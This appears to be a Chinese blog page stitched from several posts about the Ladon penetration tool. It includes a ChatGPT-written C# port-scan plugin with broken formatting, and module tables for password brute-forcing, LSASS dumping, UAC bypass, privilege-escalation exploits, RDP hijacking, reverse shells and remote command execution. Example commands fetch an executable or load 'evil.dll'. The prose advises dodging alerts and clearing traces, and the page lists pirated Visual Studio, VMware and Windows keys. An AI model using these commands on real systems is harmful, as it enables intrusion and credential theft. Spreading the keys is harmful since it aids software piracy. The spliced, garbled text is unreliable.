渗透时,我们不需要对不存在的URL进行分析,或者说存在但是当前IP被目标限制了访问不到,所以探测不到。不管是因为不存在而访问不到,还是IP限制访问不到,都无法对它进行渗透,如果C段存活主机非常多,或者说扫描B段,既然我们不关注不可访问结果,那么没必要让它显示。
它给出了最终的代码,编译后,使用Ladon扫描C段,就只回显网页标题了
1 | using System; |
```csharp
using System;
using System.Collections.Generic;
using System.Net;
using System.Net.Sockets;
namespace LadonDLL
{
public class scan
{
public static string run(string ip)
{
if (string.IsNullOrEmpty(ip))
return “”;
// 要扫描的端口列表 List<int> ports = new List<int>() { 21, 80, 443, 22, 445, 135 }; string result = ""; // 扫描每个端口并添加结果到字符串 foreach (int port in ports) { if (IsPortOpen(ip, port)) { result += $"{ip}\t{port}\tOPEN\r\n"; } } return result; } // 检查端口是否开放 static bool IsPortOpen(string ip, int port) { try { using (TcpClient client = new TcpClient()) { client.Connect(ip, port); return true; } } catch { return false; } }}
}
```csharp
PS:Ladon自带模块WebScan或WhatCMS或PortScan均包含网页标题功能获取,PortScan端口扫描模块也包含很多协议指纹识别,大家有兴趣也可以让chatGPT帮实现更多更好用的插件功能。
本文演示如何使用ChatGPT开发Ladon插件,快速扩展Ladon扫描能力,借助ChatGPT,编程新手也可以快速编写POC。有一点大家要注意,使用ChatGPT做一件事最好只在一个chat里操作,不然它会结合上下文,把你的需求搞乱,给多余或混乱代码。你自身的专业能力越强,它和你的对话就越专业,你问得模糊不清,自己一知半解,你的专业术语或表述不对,它给你的结果自然垃圾。甚至有时候它给的很多代码压根就不能用,但是它胡编乱造的能力,让你一眼觉得代码是正确可用的,实际编译发现,不能用,比如某些协议它给的包就压根不对,我测试了十几次,同样问题它随机给了好几次代码,其中有3次重复,但这些不是重点,重点是都用不了,有是发包协议是这个数组有时是另一个,有时是对的,但整个请求代码还有其它错误,导致用不了,你得告诉它教它改,虽然这样,就它目前的能力,也是非常强的,让它写一个Ladon简单功能插件,基本也就5分钟左右,当然如果需求足够清晰,够了解它,让它不要乱改什么,要实现的功能,每一条都写清楚,也有可能一步到位,一问就搞定,加上编译测试,整个过程估计也就一分钟左右。
https://github.com/k8gege/ChatLadon
【视频】ChatGPT编写Ladon渗透插件之端口扫描.rar
【视频】ChatGPT编写Ladon渗透插件之网页标题获取.rar
最新版本:https://k8gege.org/Download
历史版本: https://github.com/k8gege/Ladon/releases
vs2022永久激活密钥:
Visual Studio 2022 Enterprise:VHF9H-NXBBB-638P6-6JHCY-88JWH (K8成功)
Visual Studio 2022 Professional:TD244-P4NB7-YQ6XK-Y8MMM-YWV2J
Visual Studio 2019 Enterprise(K8成功)
BF8Y8-GN2QH-T84XB-QVY3B-RC4DF
Visual Studio 2019 Professional
NYWVH-HT4XC-R2WYW-9Y3CM-X4V3Y
Visual Studio 2017(VS2017)
企业版 Enterprise
注册码:NJVYC-BMHX2-G77MM-4XJMR-6Q8QF K8成功
VS 2015
企业版:http://download.microsoft.com/download/B/8/F/B8F1470D-2396-4E7A-83F5-AC09154EB925/vs2015.ent_chs.iso
激活密钥:HM6NR-QXX7C-DFW2Y-8B82K-WTYJV
VS2013 产品密钥 – 所有版本
Visual Studio Ultimate 2013 KEY(密钥):BWG7X-J98B3-W34RT-33B3R-JVYW9 K8成功
Visual Studio Premium 2013 KEY(密钥):FBJVC-3CMTX-D8DVP-RTQCT-92494
Visual Studio Professional 2013 KEY(密钥): XDM3T-W3T3V-MGJWK-8BFVD-GVPKY
Team Foundation Server 2013 KEY(密钥):MHG9J-HHHX9-WWPQP-D8T7H-7KCQG
PowerLadon: https://github.com/k8gege/PowerLadon
History: http://github.com/k8gege/Ladon/releases
9.1.1:http://k8gege.org/Download
10.8:K8小密圈
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Ladon Study包含网络资产探测、漏洞检测、漏洞EXP、网络密码审计、信息收集、横向移动、密码读取、本地提权等144个功能。使用超级简单,只需填写目标IP、URL、域名、IP段、TXT等,点击对应按钮一键操作。如下图,填好C段IP后,使用ICMP探测C段存活主机。
虽说是给小白专用,实际上Ladon命令行最初定位也是任意人群,类似Python所说的三岁小孩都能学会。但可能是命令行的缘故,即便简单对于很多人来说还是比较喜欢用GUI,也有另一个原因,功能太多了,又是英文的,很多人不知道都有哪些功能,有些功能甚至我都没空写使用文档,时间久了,不说大家不知道,就我自己有时也会忘记自己的工具有哪些功能。因此我决定弄这么一个工具,各模块功能一目了然,方便大家或自己本地使用,同时也方便很多新人,不用每个都来问我什么功能用什么模块等这种Wiki就有的问题,使用该工具点击对应按钮后,标题上会显示对应命令,当你在CS、webshell、其它shell下使用时,就知道该用什么模块或命令了。
无论是内网还是外网渗透,渗透前还是后,最重要的一步是信息收集,网络渗透第一步就是远程收集目标信息,探测到的资产越多,渗透成功率越高,东边不亮西边亮。渗透中获识别出来的资产信息越详细,特别是操作系统识别、CMS应用版本、设备型号越准,对于定制POC可以节省很多不必要的时间。比方说你手上或网上有某个POC,但影响范围是9.5到10.2的版本,探测出来的版本是10.3或9.4,就没必要搭环境测试或者说拿去打目标了。如果是0day,乱打导致被抓,损失惨重,如果是公开POC,那也不能打,因为发一个已知漏洞包,可能会触发警报,打草惊蛇。如果探测版本在影响范围内,可以打,成功了清理痕迹就是。
资产探测不属于漏洞,只是使用正常协议访问,获取对应结果,整个过程是不会触发安全软件警报的。如果某个协议探测不到存活主机,如ICMP协议,可能是目标禁ping,就是说不管你用什么扫描工具,通过ICMP协议都探测不到,并不是说安全软件报警不给扫。整个通信都和系统PING发包一模一样,安全软件从哪个特征来杀呢?整个过程又没执行恶意代码,所以没办法标记为恶意。但是ICMP协议探测不到存在主机怎么办?换协议啊,有可能SMB协议通呢,如果目标为了防止MS17010攻击关闭了445,那我们也可以通过WMI啊,Winrm等其它协议探测存活主机啊。有时候大家通过SMB和WMI探测到相同数量的存活主机或主机信息,就误以为两功能没区别。实战的时候就老是傻傻的只用一个协议探测,这做法是错的,可能只是刚好你遇到的这几个目标的人都傻B,电脑配置都差不多。但是你在实战多尝试一些项目,就会发现,可能通过SMB只能探测到8台机器,但是通过WMI可探测到20台,通过NBT能探测到50台,通过ICMP探测到18台,SNMP协议探测到8台路由器或打印机等设备,于是有人下结论说NBT协议最好。才做几个项目啊就下结论了,真正实战多了你就会发现,每个目标都不一样,有些应用系统压根就没装,有些管理员配置直接给你关了。所以只单纯用几个协议去探资产能搞下项目的,只能说运气爆棚。
故名思义就是发送特定的漏洞数据包,检测目标是否存在相应漏洞。整个过程可能无害,但是POC和EXP可能触发的关键部位一致,有些杀软或防火墙会拦截,流量上也会记录攻击。所以漏洞探测和资产探测有很大区别,当然有时候构造的POC是不会被杀软拦截的,如使用MS17010攻击时,很多杀软,比如卡巴会直接提示受到黑客使用MS17010攻击,或者不提示直接后台拦截EXP,导致无法GetShell,但是不管我们使用Ladon探测多少次MS17010漏洞,卡巴都不报警也不提示受到攻击,因为我们确实没攻击啊,POC没被拦截,是因为卡巴没完全监控到触发点。所以漏洞POC和EXP又是两码事,杀软对它的态度也是不一样的,有些POC发烧,症状接近EXP,检测因为误报,刚好歪打正着把POC拦截了。但对于无症状“感染者”,杀软是很难判定它有问题的,说到底本身POC也是无损检测对系统无害的。
模块使用也非常简单,通过资产探测检测出目标开放端口,如果出现工具上的端口,就可使用对应端口的密码审计模检测弱口令。在没任何漏洞的情况下,密码也是一个拿权限的突破口。即便跑不出密码,该功能也有其它用途。假设你在大型内网,曾获取过大量密码,也可以用于验证哪些机器或用户密码还有效。其次有些模块在不提供密码字典时,会探测对应协议的应用版本,如FTP,会检测目标所使用的FTP版本,对应FTP版本存在漏洞,我们也可以无需密码GetShell。
PS:密码审计 下次更新计划 添加默认弱口令 不用再设置密码 更傻瓜化
内网渗透时通过嗅探、读取密码、翻看管理员密码本、密码审计等方式获取到内网其它机器密码时,可通过以下方式远程执行命令获取权限。本工具主要让大家熟悉下基本用法,对于CS或其它shell下的特殊用法请使用命令行版本,以下部分模块支持文件上传或HASH传递执行,均需使用命令行版。
获取机器权限后,如果是IIS服务器,可以读取IIS站点密码、FTP密码等,对于个人机也可以读取Wifi密码、VPN密码、Chrome浏览器密码、Firefox密码、Edge密码、CocCoc密码等
InfoScan内置20+协议探测存活主机 默认先PING通后再扫描。虽然是OnlinePC的升级版,但Ping不通就不探测其它协议。可当作可达网段探测,可出网协议探测。想要结果更全需使用禁ping扫描。PocScan\ExpScan等同理,使用内置POC或EXP探测目标机器是否存在相关漏洞。AllScan所有功能一键调用。
最新版本:https://k8gege.org/Download
历史版本: https://github.com/k8gege/Ladon/releases
1 | Usage: |
Ladon.exe for windows
Brute Exchange password
Ladon for Cobalt Strike CLI
Ladon for Cobalt Strike GUI
PowerLadon: https://github.com/k8gege/PowerLadon
History: http://github.com/k8gege/Ladon/releases
9.1.1:http://k8gege.org/Download
10.8:K8小密圈
17.0
JU090-6039P-08409-8J0QH-2YR7F
vmware12及vmware14注册码
vmware12 5A02H-AU243-TZJ49-GTC7K-3C61N
vmware14 CG54H-D8D0H-H8DHY-C6X7X-N2KG6
vm 12.0 - 12.5.0
5A02H-AU243-TZJ49-GTC7K-3C61N
15.5
UY758-0RXEQ-M81WP-8ZM7Z-Y3HDA
WIN7 X64 旗舰版 注册码
HT6VR-XMPDJ-2VBFV-R9PFY-3VP7R
VMware Workstation 10.0 序列号(KEY)
5F29M-48312-8ZDF9-A8A5K-2AM0Z
PowerLadon: https://github.com/k8gege/PowerLadon
History: http://github.com/k8gege/Ladon/releases
9.1.1:http://k8gege.org/Download
10.8:K8小密圈
ID | 主题 | URL |
---|---|---|
0 | Ladon文档主页 | https://k8gege.org/Ladon/ |
1 | Ladon基础文档 | http://k8gege.org/p/648af4b3.html |
2 | Ladon用法例子 | http://k8gege.org/Ladon/example.html |
3 | 基础用法详解 | https://github.com/k8gege/Ladon/wiki/Ladon-Usage |
4 | Cobalt Strike | https://github.com/k8gege/Aggressor |
5 | Exp生成器使用 | https://github.com/k8gege/Ladon/wiki/LadonExp-Usage |
6 | 高度自定义插件 | https://github.com/k8gege/Ladon/wiki/Ladon-Diy-Moudle |
7 | 外部模块参考 | https://github.com/k8gege/K8CScan/wiki |
8 | PowerLadon | https://github.com/k8gege/powerladon |
9 | PythonLadon | https://github.com/k8gege/PyLadon |
10 | LinuxLadon | https://github.com/k8gege/KaliLadon |
11 | LadonGo全平台 | https://github.com/k8gege/LadonGo |
12 | 漏洞演示视频 | https://github.com/k8gege/K8CScan/tree/master/Video |
13 | Ladon6.0功能 | http://k8gege.org/p/56393.html |
14 | Ladon6.2功能 | http://k8gege.org/p/39070.html |
13 | Ladon6.4功能 | http://k8gege.org/p/55476.html |
16 | Ladon6.5功能 | http://k8gege.org/Ladon/WinShell.html |
17 | Ladon9.1功能 | http://k8gege.org/Ladon/ladon91.html |
git clone https://github.com/k8gege/Ladon.git
使用VS2012或以上版本分别编译.net 3.5、4.0版本EXE
https://github.com/k8gege/Ladon/releases
Win7/2008或安装.net 2.x 3.x系统可使用Ladon.exe
Win8-win10或安装.net 4.x系统可使用Ladon40.exe
无论内网还是外网渗透信息收集都是非常关键,信息收集越多越准确渗透的成功率就越高。
但成功率还受到漏洞影响,漏洞受时效性影响,对于大型内网扫描速度直接影响着成功率。
漏洞时效性1-2天,扫描内网或外网需1周时间,是否会因此错过很多或许可成功的漏洞?
对于那些拥有几百上千域名的大站来说,你发现越快成功率就越高,慢管理员就打补丁了。
因此我们需要一个支持批量C段/B段甚至A段的扫描器,添加自定义模块快速检测新出漏洞。
Ladon音译: 拉登或拉冬。因集成了很多模块,每个模块又可独立成为一个工具,和百头巨龙有很多头类似。
Ladon是希腊神话中的神兽,看守金苹果的百头巨龙。它从不睡觉,被赫拉克勒斯借扛天巨人之手诱巨龙睡着
杀死巨龙并偷得了金苹果。巨龙死前将自己的魂魄封印在金苹果中,偷盗者将金苹果送给了白雪公主,公主
为了报恩将金苹果分给了七个小矮人,吃下以后他们变成了龙珠散落到世界各地,龙珠分为七颗,它蕴含着
可以令奇迹发生的力量。当集齐7颗龙珠念出咒语,就能召唤神龙,而神龙则会实现召唤者提出的一个愿望。
Ladon大型内网渗透\域渗透\横向工具,可PowerShell模块化、可CS插件化、可内存加载,无文件扫描。含端口扫描、服务识别、网络资产探测、密码审计、高危漏洞检测、漏洞利用、密码读取以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描等。11.6版本内置252个功能模块,网络资产探测模块32种协议(ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP)以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、交换机、数据库、打印机等信息,高危漏洞检测16个包含Cisco、Zimbra、Exchange、DrayTek、MS17010、SMBGhost、Weblogic、ActiveMQ、Tomcat、Struts2系列、Printer等,密码审计23个含数据库(Mysql、Oracle、MSSQL)、FTP、SSH、VNC、Windows(LDAP、SMB/IPC、NBT、WMI、SmbHash、WmiHash、Winrm)、BasicAuth、Tomcat、Weblogic、Rar等,远程执行命令包含(smbexec/wmiexe/psexec/atexec/sshexec/webshell),Web指纹识别模块可识别135+(Web应用、中间件、脚本类型、页面类型)等,本地提权21+含SweetPotato\BadPotato\EfsPotato\BypassUAC,可高度自定义插件POC支持.NET程序集、DLL(C#/Delphi/VC)、PowerShell等语言编写的插件,支持通过配置INI批量调用任意外部程序或命令,EXP生成器可一键生成漏洞POC快速扩展扫描能力。Ladon支持Cobalt Strike插件化扫描快速拓展内网进行横向移动。
虽然Ladon功能丰富多样,但使用却非常简单,任何人都能轻易上手
只需一或两个参数就可用90%的功能,一个模块相当于一个新工具
Ladon.exe可在安装有.net 2.0及以上版本Win系统中使用(Win7后系统自带.net)
如Cmd、PowerShell、远控Cmd、WebShell等,以及Cobalt Strike内存加载使用
Ladon.ps1完美兼容win7-win10 PowerShell,不看版本可远程加载实现无文件渗透
全平台:Linux、MacOS、Windows等OS
https://github.com/k8gege/LadonGo
实战并不那么顺利,有些内网转发后很卡或无法转发,只能将工具上传至目标
有些马可能上传两三M的程序都要半天甚至根本传不了,PY的几十M就更别想了
Ladon采用C#研发,程序体积很小500K左右,即便马不行也能上传500K程序吧
还不行也可PowerShell远程内存加载,这点是PY或GO编译的大程序无法比拟的
一条龙服务,为用户提供一个简单易用、功能丰富、高度灵活的扫描工具
扫描流量小
程序体积小
功能丰富强大
程序简单易用
插件支持多种语言
跨平台(Win/Kali/Ubuntu)等
支持Cobalt Strike插件化
支持PowerShell无文件渗透
Exp生成器可一键生成Poc
多版本适用各种环境
1 支持指定IP扫描
2 支持指定域名扫描
3 支持指定机器名扫描
4 支持指定C段扫描(ip/24)
5 支持指定B段扫描(ip/16)
6 支持指定A段扫描(ip/8)
7 支持指定URL扫描
8 支持批量IP扫描(ip.txt)
9 支持批量C段扫描(ip24.txt)
10 支持批量B段扫描(ip16.txt)
11 支持批量URL扫描(url.txt)
12 支持批量域名扫描(domain.txt)
13 支持批量机器名扫描(host.txt)
14 支持批量国家段扫描(cidr.txt)
15 支持批量字符串列表(str.txt)
16 支持主机帐密列表(check.txt)
17 支持用户密码列表(userpass.txt)
18 支持指定范围C段扫描
19 支持参数加载自定义DLL(仅限C#)
20 支持参数加载自定义EXE(仅限C#)
21 支持参数加载自定义INI配置文件
22 支持参数加载自定义PowerShell
23 支持自定义程序(系统命令或第三方程序即任意语言开发的程序或脚本)
24 插件(支持多种语言C#/Delphi/Golang/Python/VC/PowerShell)
25 支持Cobalt Strike(beacon命令行下扫描目标内网或跳板扫描外网目标)
26 支持CIDR格式IP扫描,如100.64.0.0/10,192.168.1.1/20等
27 INI配置支持自定义程序密码爆破
例子: Ladon OnlinePC(扫当前机器所处C段,其它模块同理)
例子: Ladon 192.168.1.8/24 OnlinePC
ID | 模块名称 | 功能说明 | 返回结果 |
---|---|---|---|
1 | ICMP | 存活主机扫描 | 存活IP(探测速度很快3-6秒/C段) |
2 | OnlinePC | 存活主机扫描 | 存活IP、Mac地址、机器名、设备制造商 |
3 | OnlineIP | 仅存活主机IP | 存活IP |
4 | UrlScan | URL域名扫描 | 同服URL(不验证IP、域名、Web标题) |
5 | SameWeb | 同服域名扫描 | 同服URL(验证IP、域名、Web标题) |
6 | WebScan | Web信息扫描 | 存活IP、主机名、Banner、Web标题 |
7 | WebDir | 后台目录扫描 | 地址、HTTP状态 |
8 | SubDomain | 子域名爆破 | 子域名 (可用DomainIP/HostIP解析) |
9 | DomainIP | 域名解析IP | 域名、IP |
10 | HostIP | 主机名转IP | IP、域名 |
11 | AdiDnsDump | 域内机器信息获取(非域内请使用LdapScan探测) | IP、域名 |
例子: Ladon OsScan
例子: Ladon 192.168.1.8/24 OsScan
ID | 模块名称 | 功能说明 | 返回结果 |
---|---|---|---|
1 | OsScan | 操作系统版本探测 | 存活IP、工作组\机器名、操作系统、开放服务 |
2 | PortScan | 端口扫描含Banner | 主机名、开放端口、服务识别、Banner、Web |
3 | WhatCMS | 86种Web指纹识别 | URL、CMS、邮件系统、登陆页面、中间件(如Apache\Tomecat\IIS)等 |
4 | CiscoScan | 思科设备扫描 | 存活IP、设备型号、主机名、Boot、硬件版本 |
5 | EnumMssql | 枚举Mssql数据库主机 | 数据库IP、机器名、SQL版本 |
6 | EnumShare | 枚举网络共享资源 | 域、存活IP、共享路径 |
7 | LdapScan | 不指定密码时,仅探测LDAP服务器 | IP是否LDAP服务器 |
8 | FtpScan | 不指定密码时,仅探测FTP服务器 | IP是否FTP服务器 |
9 | EthScan | OXID多网卡主机探测 | |
10 | DnsScan | OXID多网卡主机探测 | |
11 | SmbInfo | SMB信息探测 | 存活IP、机器名、Win版本、域名、DNS |
12 | NbtInfo | NBT信息探测 | 存活IP、机器名、Win版本、域名、DNS |
13 | WmiInfo | WMI信息探测 | 存活IP、机器名、Win版本、域名、DNS |
14 | RdpInfo | RDP信息探测 | 存活IP、机器名、Win版本、域名、DNS |
15 | WinrmInfo | Winrm信息探测 | 存活IP、机器名、Win版本、域名、DNS |
16 | MssqlInfo | Mssql信息探测 | 存活IP、机器名、Win版本、域名、DNS |
17 | ExchangeInfo | Exchange信息探测 | 存活IP、机器名、Win版本、域名、DNS |
18 | WhatCms | Exchange服务器探测 | 存活IP、Exchange、Banner |
[自定义端口(IP:端口)、帐密检测(用户 密码)、主机帐密检测(IP 端口 数据库 用户 密码)]
例子: Ladon SshScan
例子: Ladon 192.168.1.8/24 SshScan
例子: Ladon 192.168.1.8:22 SshScan (指定端口)
例子: Ladon test.rar RarScan
ID | 模块名称 | 功能说明 | 返回结果 | 依赖 |
---|---|---|---|---|
1 | SmbScan | SMB密码爆破(Windows) | 检测过程、成功密码、LOG文件 | |
2 | WmiScan | Wmi密码爆破(Windowns) | 检测过程、成功密码、LOG文件 | |
3 | NbtScan | Ipc密码爆破(Windows) | 检测过程、成功密码、LOG文件 | |
4 | LdapScan | AD域密码爆破(Windows) | 检测过程、成功密码、LOG文件 | |
5 | SmbHashScan | SMB HASH密码爆破(Windows) | 检测过程、成功密码、LOG文件 | |
6 | WmiHashScan | WMI HASH密码爆破(Windows) | 检测过程、成功密码、LOG文件 | |
7 | SshScan | SSH密码爆破(Linux) | 检测过程、成功密码、LOG文件 | |
8 | MssqlScan | Mssql数据库密码爆破 | 检测过程、成功密码、LOG文件 | |
9 | OracleScan | Oracle数据库密码爆破 | 检测过程、成功密码、LOG文件 | |
10 | MysqlScan | Mysql数据库密码爆破 | 检测过程、成功密码、LOG文件 | |
11 | WeblogicScan | Weblogic后台密码爆破 | 检测过程、成功密码、LOG文件 | |
12 | VncScan | VNC远程桌面密码爆破 | 检测过程、成功密码、LOG文件 | |
13 | FtpScan | Ftp服务器密码爆破 | 检测过程、成功密码、LOG文件 | |
14 | RarScan | Rar压缩包密码爆破 | 检测过程、成功密码、LOG文件 | Rar.exe |
15 | TomcatScan | Tomcat后台登陆密码爆破 | 检测过程、成功密码、LOG文件 | |
16 | HttpBasicScan | HttpBasic401认证密码爆破 | 检测过程、成功密码、LOG文件 | |
17 | WinrmScan | Winrm认证密码爆破 | 检测过程、成功密码、LOG文件 | |
18 | NbtScan | Netbios密码爆破 | 检测过程、成功密码、LOG文件 | |
19 | DvrScan | 摄像头密码爆破 | 检测过程、成功密码、LOG文件 |
例子: Ladon MS17010
例子: Ladon 192.168.1.8/24 MS17010
例子: Ladon http://192.168.1.8 WeblogicExp
ID | 模块名称 | 功能说明 |
---|---|---|
1 | MS17010 | SMB漏洞检测(CVE-2017-0143/CVE-2017-0144/CVE-2017-0145/CVE-2017-0146/CVE-2017-0148) |
2 | SMBGhost | SMBGhost远程溢出漏洞检测 (CVE-2020-0796) |
3 | WeblogicPoc | Weblogic漏洞检测(CVE-2019-2725/CVE-2018-2894) |
4 | PhpStudyPoc | PhpStudy后门检测(phpstudy 2016/phpstudy 2018) |
5 | ActivemqPoc | ActiveMQ漏洞检测(CVE-2016-3088) |
6 | TomcatPoc | Tomcat漏洞检测(CVE-2017-12615) |
7 | WeblogicExp | Weblogic漏洞利用(CVE-2019-2725) |
8 | TomcatExp | Tomcat漏洞利用(CVE-2017-12615) |
9 | Struts2Poc | Struts2漏洞检测(S2-005/S2-009/S2-013/S2-016/S2-019/S2-032/DevMode) |
10 | ZeroLogon | CVE-2020-1472域控提权漏洞EXP |
11 | CVE-2020-0688 | CVE-2020-0688 Exchange序列化漏洞利用 |
12 | CVE-2020-0796 | SMBGhost Win10远程漏洞 |
例子: Ladon 字符串 EnHex
例子: Ladon EnHex (批量str.txt)
ID | 模块名称 | 功能说明 |
---|---|---|
1 | EnHex | 批量Hex密码加密 |
2 | DeHex | 批量Hex密码解密 |
3 | EnBase64 | 批量Base64密码加密 |
4 | DeBase64 | 批量Base64密码解密 |
下载功能主要用于内网文件传输或者将VPS文件下载至目标机器
ID | 模块名称 | 功能说明 | 用法 |
---|---|---|---|
1 | HttpDownLoad | HTTP下载 | Ladon HttpDownLoad http://k8gege.org/test.exe |
2 | FtpDownLoad | Ftp下载 | Ladon FtpDownLoad 127.0.0.1:21 admin admin test.exe |
基于Socket RAW嗅探,无需安装Winpcap,但需管理员权限
主要用于发现内网存活机器或嗅探管理员登陆FTP或WEB站点密码
后续可能会添加其它功能可能另外写个专门用于嗅探的工具
PS: 目前网上大部嗅探工具都是基于Winpcap抓包,某些机器针对其做限制,会提示找不到网卡无法嗅探。
重点是不少程序不是GUI就是只能在Linux下用,如果你用py的SCAPY(需winpcap)来实现发现程序高达48M
当然也可用于发现恶意木马上线地址(如Cobal strike默认一分钟才发包的netstat不一定看得到)
ID | 模块名称 | 功能说明 | 用法 |
---|---|---|---|
1 | FtpSniffer/SnifferFtp | Ftp密码嗅探 | Ladon FtpSniffer 192.168.1.5 |
2 | HttpSniffer/SnifferHTTP | HTTP密码嗅探 | Ladon HTTPSniffer 192.168.1.5 |
3 | Sniffer | 网络嗅探(源地址、目标地址) | Ladon Sniffer |
ID | 模块名称 | 功能说明 | 用法 |
---|---|---|---|
1 | EnumIIS/IisPwd | IIS站点密码读取 | Ladon EnumIIS 或 Ladon IisPwd |
2 | DumpLsass | DumpLsass内存密码 | Ladon DumpLsass |
3 | web | 捕获Win密码 |
ID | 模块名称 | 功能说明 | 用法 |
---|---|---|---|
1 | EnumProcess/ProcessList/tasklist | 进程详细信息 | Ladon EnumProcess 或 Ladon Tasklist |
2 | GetCmdLine/CmdLine | 获取命令行参数 | Ladon cmdline 或 Ladon cmdline cmd.exe |
3 | GetInfo/GetInfo2 | 获取渗透基础信息 | Ladon GetInfo 或 Ladon GetInfo2 |
4 | GetPipe | 查看本机命名管道 | Ladon GetPipe |
5 | RdpLog | 查看3389连接记录 | Ladon RdpLog |
6 | QueryAdmin | 查看管理员组用户 | Ladon QueryAdmin |
7 | NetVer | 查看安装.NET版本 | Ladon NetVer 或 Ladon NetVersion |
8 | PsVer | 查看PowerShell版本 | Ladon PsVer 或 Ladon PSVersion |
9 | whoami | 查看当前用户与特权 | Ladon whoami |
10 | recent | 查看用户最近访问文件 | Ladon recent |
11 | AllVer | 获取已安装程序列表 | Ladon AllVer |
12 | Usblog | 查看USB使用记录 | Ladon Usblog |
ID | 模块名称 | 功能说明 | 用法 |
---|---|---|---|
1 | WmiExec | 135端口执行命令 | http://k8gege.org/Ladon/WinShell.html |
2 | PsExec | 445端口执行命令 | http://k8gege.org/Ladon/WinShell.html |
3 | AtExec | 445端口执行命令 | http://k8gege.org/Ladon/WinShell.html |
4 | SshExec | 22端口执行命令 | http://k8gege.org/Ladon/WinShell.html |
5 | JspShell | Jsp一句话执行命令 | http://k8gege.org/p/ladon_cs_shell.html |
6 | WebShell | WebShell执行命令 | http://k8gege.org/Ladon/webshell.html |
7 | WebShell | CVE-2020-17144 | http://k8gege.org/p/CVE-2020-17144.html |
8 | WinrmExec | 5895端口执行命令 | http://k8gege.org/Ladon/WinrmExec.html |
9 | SmbExec | 445端口HASH执行命令 | http://k8gege.org/Ladon/SmbExec.html |
ID | 模块名称 | 功能说明 | 用法 |
---|---|---|---|
1 | BypassUac | 绕过UAC执行,支持Win7-Win10 | Ladon BypassUac c:\1.exe 或 Ladon BypassUac c:\1.bat |
2 | GetSystem | 提权或降权运行程序 | Ladon GetSystem cmd.exe 或 Ladon GetSystem cmd.exe explorer |
3 | Runas | 模拟用户执行命令 | Ladon Runas user pass cmd |
4 | ms16135 | 提权至SYSTEM | Ladon ms16135 whoami |
5 | BadPotato | IIS或服务用户提权至SYSTEM | Ladon BadPotato cmdline |
6 | SweetPotato | IIS或服务用户提权至SYSTEM | Ladon SweetPotato cmdline |
7 | SweetPotato | Win10/2016提权至System | Ladon SweetPotato cmdline |
8 | RDPHijack | 远程桌面会话劫持 | Ladon RDPHijack sessionID |
9 | CVE-2021-1675 | 打印机漏洞提权 | Ladon CVE-2021-1675 c:\evil.dll |
ID | 模块名称 | 功能说明 | 协议 |
---|---|---|---|
1 | netcat | 反弹Shell系列教程 | TCP |
2 | MSF_Shell | 反弹Shell系列教程 | TCP/HTTP/HTTPS |
3 | PowerCat | 反弹Shell系列教程 | TCP/UDP/ICMP |
4 | MSF_Meter | 反弹Shell系列教程 | TCP/HTTP/HTTPS |
5 | runas | Runas反弹Shell | TCP |
1 | PortTran | 内网端口转发
2 | netsh | 系统命令端口转发
ID | 模块名称 | 功能说明 | 用法 |
---|---|---|---|
1 | EnableDotNet | 一键启用.net 3.5(2008系统默认未启用) | Ladon EnableDotNet |
2 | gethtml | 获取内网站点HTML源码 | Ladon gethtml http://192.168.1.1 |
3 | CheckDoor | 检测后门(网上公开多年的) | Ladon CheckDoor 或 Ladon AutoRun |
4 | GetIP | 获取本机内网IP与外网IP | Ladon GetIP |
5 | Open3389 | 一键开启3389 | Ladon Open3389 |
6 | ActiveAdmin | 激活内置用户Administrator | Ladon ActiveAdmin |
7 | ActiveGuest | 激活内置用户Guest | Ladon ActiveGuest |
8 | RunPS | 无PowerShell.exe执行PowerShell脚本 | Ladon RunPS *.ps1 |
9 | RegAuto | 添加注册表RUN启动项 | |
10 | sc | 服务加启动项(system权限) | |
11 | sc | 服务执行程序(system权限) | |
12 | at | 计划执行程序(无需时间)(system权限) |
注:以上仅是该工具内置模块的初级用法,外置插件或更高级用法请查看使用文档
中级用法INI文件配置调用任意程序、系统命令、各种语言现成EXP的批量利用
高级用法Exp生成器一键生成Poc,使用各种语言编写插件扩展Ladon扫描能力。
ID | 功能 | 实现语言 | 功能说明 |
---|---|---|---|
1 | 漏洞扫描 | C语言 | CVE 2019-0708 Windows Rdp 3389漏洞批量检测 |
2 | 漏洞利用 | Exp生成器 | ThinkPHP 5.0.22 5.1.29 RCE GetShell Exploit |
3 | 漏洞利用 | Python | CVE-2019-9621 Zimbra GetShell Exploit |
4 | 漏洞利用 | Python | CVE-2019-0604 SharePoint GetShell Exploit |
5 | 漏洞利用 | Exp生成器 | CVE 2016-3088 ActiveMQ GetShell Exploit |
6 | 漏洞利用 | Python | Apache Solr 8.2.0 Velocity RCE 0day Exploit |
7 | 漏洞利用 | Exp生成器 | PhpStudy后门 GetShell Exploit |
8 | 命令执行 | INI配置 | INI调用外部程序命令批量Linux上控 |
9 | 命令执行 | INI配置 | INI调用外部程序命令批量Windowns上控 |
10 | 漏洞扫描 | Python | PHP-FPM 远程代码执行漏洞(CVE-2019-11043) |
11 | 漏洞扫描 | Exp生成器 | Weblogic CVE-2018-2894漏洞检测 |
12 | 漏洞利用 | PowerShell | MS17010EXP 永恒之蓝漏洞利用 |
13 | 脚本调用 | PowerShell | Kali 2019无PowerShell执行脚本 |
14 | 口令扫描 | INI配置 | ipcscan.ini INI插件之Ipc密码爆破 |
15 | 口令扫描 | INI配置 | smbscan.ini INI插件之Smb密码爆破 |
16 | 口令扫描 | INI配置 | smbhash.ini INI插件之NtlmHash爆破 |
17 | 口令扫描 | INI配置 | winrmscan.ini INI插件之Winrm密码爆破 |
18 | 信息收集 | .NET | 检测网站是否使用Shiro |
19 | 漏洞扫描 | Python | 域控提权CVE-2020-1472-EXP |
20 | 漏洞利用 | Exp生成器 | Drupal CVE-2018-7600 |
21 | CVE-2020-0796 | SMBGhost Win10远程漏洞 | |
22 | 漏洞利用 | Exp生成器 | IIS写权限漏洞利用 |
文档参考Cscan: https://github.com/k8gege/K8CScan/wiki
0x001 参数 ip/24 ip/16 ip/8
命令: Ladon 192.168.1.8/24 OnlinePC
0x002 文件 ip.txt ip24.txt ip16.txt url.txt host.txt domain.txt str.txt
程序根目录下创建对应文件即可,如批量扫描多个ip使用ip.txt,批量扫多个C段使用ip24.txt
无需指定txt程序会自动加载文件进行扫描,如扫描存活主机只需命令: Ladon OnlinePC
